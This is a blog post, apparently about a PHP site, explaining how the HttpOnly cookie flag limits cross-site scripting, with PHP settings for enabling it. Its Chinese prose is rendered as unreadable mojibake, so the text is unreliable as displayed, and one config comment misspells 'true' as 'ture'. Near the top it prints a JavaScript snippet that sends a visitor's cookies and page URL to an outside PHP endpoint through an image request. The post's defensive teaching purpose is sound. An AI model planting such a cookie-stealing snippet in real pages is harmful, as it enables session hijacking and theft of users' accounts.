ÀûÓÃHttpOnlyÀ´·ÀÓùxss¹¥»÷
xssµÄ¸ÅÄî¾Í²»Óöà˵ÁË£¬ËüµÄΣº¦ÊǼ«´óµÄ£¬Õâ¾ÍÒâζ×ÅÒ»µ©ÄãµÄÍøÕ¾³öÏÖxss©¶´£¬¾Í¿ÉÒÔÖ´ÐÐÈÎÒâµÄjs´úÂë,×î¿ÉŵÄÊǹ¥»÷ÕßÀûÓÃjs»ñÈ¡cookie»òÕßsession½Ù³Ö£¬Èç¹ûÕâÀïÃæ°üº¬ÁË´óÁ¿Ãô¸ÐÐÅÏ¢£¨Éí·ÝÐÅÏ¢£¬¹ÜÀíÔ±ÐÅÏ¢£©µÈ£¬ÄÇÍêÁË¡£¡£¡£
ÈçÏÂjs»ñÈ¡cookieÐÅÏ¢£º
url=document.top.location.href; ¡¡cookie=[removed]; ¡¡c=new Image(); ¡¡c.src=¡¯http://www.phpddt.com/c.php?c=¡¯+cookie+¡¯&u=¡¯+url;Ò»°ãcookie¶¼ÊÇ´Ódocument¶ÔÏóÖлñÈ¡µÄ£¬ÏÖÔÚä¯ÀÀÆ÷ÔÚÉèÖÃCookieµÄʱºòÒ»°ã¶¼½ÓÊÜÒ»¸ö½Ð×öHttpOnlyµÄ²ÎÊý£¬¸údomainµÈÆäËû²ÎÊýÒ»Ñù£¬Ò»µ©Õâ¸öHttpOnly±»ÉèÖã¬ÄãÔÚä¯ÀÀÆ÷µÄdocument¶ÔÏóÖоͿ´²»µ½CookieÁË¡£
PHPÉèÖÃHttpOnly£º
//ÔÚphp.iniÖУ¬session.cookie_httponly = ture À´¿ªÆôÈ«¾ÖµÄCookieµÄHttpOnlyÊôÐÔ
ini_set("session.cookie_httponly", 1);
//»òÕßsetcookie()µÄµÚÆ߸ö²ÎÊýÉèÖÃΪtrue
session_set_cookie_params(0, NULL, NULL, NULL, TRUE);
¶ÔÓÚPHP5.1ÒÔÇ°°æ±¾µÄPHPͨ¹ý£º
header("Set-Cookie: hidden=value; httpOnly");
×îºó£¬HttpOnly²»ÊÇÍòÄܵģ¡
ÍƼöÐÅÏ¢
- ¡¾ÊÓƵ²¥·Å¡¿JplayerÊÓƵ²¥·ÅÆ÷µÄʹÓÃ
- memcacheÄÚ´æÔÀí
- Memcache¼¼Êõ·ÖÏí£º½éÉÜ¡¢Ê¹Óᢴ洢¡¢Ëã·¨¡¢ÓÅ»¯....
- php³£ÓÃÕýÔò±í´ïʽ
- phpÐÔÄܼà²âÄ£¿éXHProf
- ÈÃCI¿ò¼ÜÖ§³Öservice²ã
- ʹÓÃPHPÉú³É´øLOGOµÄ¸öÐÔ»¯¶þάÂëͼÏñ
- ¹ØÓÚCodeIgniterÄã¿ÉÄܲ»ÖªµÀµÄ5¸ö֪ʶµã
- Memcache ºÁÃ뼶³¬Ê±¼°ÆäËû³£¼ûÎÊÌâ»ã×Ü
- [PHP±Ê¼Ç]PHPQueryÒ»¸ö´¦ÀíDOMµÄÀûÆ÷
ÈÈÃÅÐÅÏ¢
- nohup: redirecting stderr to stdou....
- ʹÓÃlog_formatΪNginx·þÎñÆ÷ÉèÖøüÏêϸµÄÈÕÖ¾¸ñʽ
- jquery easyUI--dataGrid-Json
- [Ô´´]·ÂGoogle Reader¡¢ÐÂÀË΢²©¡¢ÌÚѶ΢²©µ....
- ÀûÓÃKeepalived+mysql¹¹½¨¸ß¿ÉÓÃMySQLË«Ö÷×Ô¶....
- Nginx+keepalivedʵÏÖ¸ºÔؾùºâºÍË«»úÈȱ¸¸ß¿ÉÓÃ
- jqueryʵÏÖÒ³Ãæ¼ÓÔؽø¶ÈÌõ
- Rolling cURL: PHP²¢·¢×î¼Ñʵ¼ù
- codeigniter ·ÓÉÖÕ¼«ÓÅ»¯(url rewrite)
- linuxÏÂÉèÖÃsshÎÞÃÜÂëµÇ¼
×î½ü¸üÐÂ
- PHP»ñÈ¡Óû§µÄÕæʵIP£¬²¢ÅжÏÊÇ·ñÄÚÍøIP
- PHP ´íÎóÈÕÖ¾ error_log
- ÀûÓÃbigpipe»úÖÆʵÏÖÒ³ÃæÄ£¿éµÄÒì²½äÖȾ chunked¼¼Êõ
- php¿ØÖÆÎļþÏÂÔØËÙ¶È
- js + php ¶ÁÈ¡¡¢²¥·ÅÊÓƵÁ÷ ¼æÈÝfirefox£¬c....
- ¡¾ÊÓƵ²¥·Å¡¿JplayerÊÓƵ²¥·ÅÆ÷µÄʹÓÃ
- UNICODE Óë UTF-8 µÄ¹Øϵ
- memcacheÄÚ´æÔÀí
- Memcache¼¼Êõ·ÖÏí£º½éÉÜ¡¢Ê¹Óᢴ洢¡¢Ëã·¨¡¢ÓÅ»¯....
- phpʹÓÃmb_detect_encoding¼ì²â×Ö·û´®±àÂë
ÆÀÂÛ